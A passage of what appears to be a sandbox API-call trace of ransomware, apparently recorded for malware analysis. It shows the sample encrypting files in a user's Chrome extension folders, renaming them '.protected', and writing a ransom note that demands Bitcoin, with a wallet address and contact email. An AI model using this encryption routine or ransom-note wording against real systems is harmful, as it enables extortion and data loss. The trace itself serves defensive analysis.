dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.147] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.147] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.147] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.147] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.148] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.148] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.148] CloseHandle (hObject=0x164) returned 1 [0080.148] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0080.148] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT") returned 144 [0080.148] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0080.148] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0080.148] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*") returned 146 [0080.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.148] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.148] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.148] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.148] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.148] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.148] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\.") returned 146 [0080.148] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.148] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.148] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.149] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.149] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.149] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.149] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.149] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\..") returned 147 [0080.149] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.149] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.149] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.149] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.149] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.149] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.149] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.149] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.149] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.150] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.150] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.150] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.150] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0080.150] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.151] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0080.151] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.151] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.151] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.151] CloseHandle (hObject=0x168) returned 1 [0080.151] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0080.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0080.152] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.152] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.152] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0080.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.152] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.152] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.153] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.153] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.153] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.153] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.153] CloseHandle (hObject=0x164) returned 1 [0080.153] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0080.153] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro") returned 141 [0080.153] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0080.154] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*") returned 143 [0080.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.154] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.154] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.154] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.154] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.154] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\.") returned 143 [0080.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.154] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.154] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.154] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.154] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.154] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.154] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\..") returned 144 [0080.154] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.154] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.154] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.154] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.154] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.155] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.155] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.155] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.155] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.156] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.156] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.156] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.156] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.156] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.156] CloseHandle (hObject=0x168) returned 1 [0080.156] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.protected") returned 165 [0080.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.protected")) returned 1 [0080.157] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.157] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.157] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0080.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.157] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your 